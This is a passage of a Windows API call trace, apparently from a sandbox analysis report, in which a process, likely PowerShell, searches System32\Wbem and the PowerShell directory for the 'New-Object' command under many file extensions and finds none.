cAlternateFileName="")) returned 0xffffffffffffffff [0224.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.326] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.327] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.psm1" (normalized: "c:\\windows\\system32\\wbem\\new-object.psm1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.327] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.327] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.psd1" (normalized: "c:\\windows\\system32\\wbem\\new-object.psd1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.328] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.COM" (normalized: "c:\\windows\\system32\\wbem\\new-object.com"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.328] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.EXE" (normalized: "c:\\windows\\system32\\wbem\\new-object.exe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.329] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.329] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.BAT" (normalized: "c:\\windows\\system32\\wbem\\new-object.bat"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.329] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.329] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.CMD" (normalized: "c:\\windows\\system32\\wbem\\new-object.cmd"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.330] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.330] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.VBS" (normalized: "c:\\windows\\system32\\wbem\\new-object.vbs"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.330] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.330] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.VBE" (normalized: "c:\\windows\\system32\\wbem\\new-object.vbe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.331] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.JS" (normalized: "c:\\windows\\system32\\wbem\\new-object.js"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.331] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.JSE" (normalized: "c:\\windows\\system32\\wbem\\new-object.jse"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.332] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.WSF" (normalized: "c:\\windows\\system32\\wbem\\new-object.wsf"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.333] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.WSH" (normalized: "c:\\windows\\system32\\wbem\\new-object.wsh"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.333] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.MSC" (normalized: "c:\\windows\\system32\\wbem\\new-object.msc"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.333] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.334] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.CPL" (normalized: "c:\\windows\\system32\\wbem\\new-object.cpl"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0224.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0224.334] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object" (normalized: "c:\\windows\\system32\\wbem\\new-object"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.334] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0224.335] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\New-Object.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\new-object.ps1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, 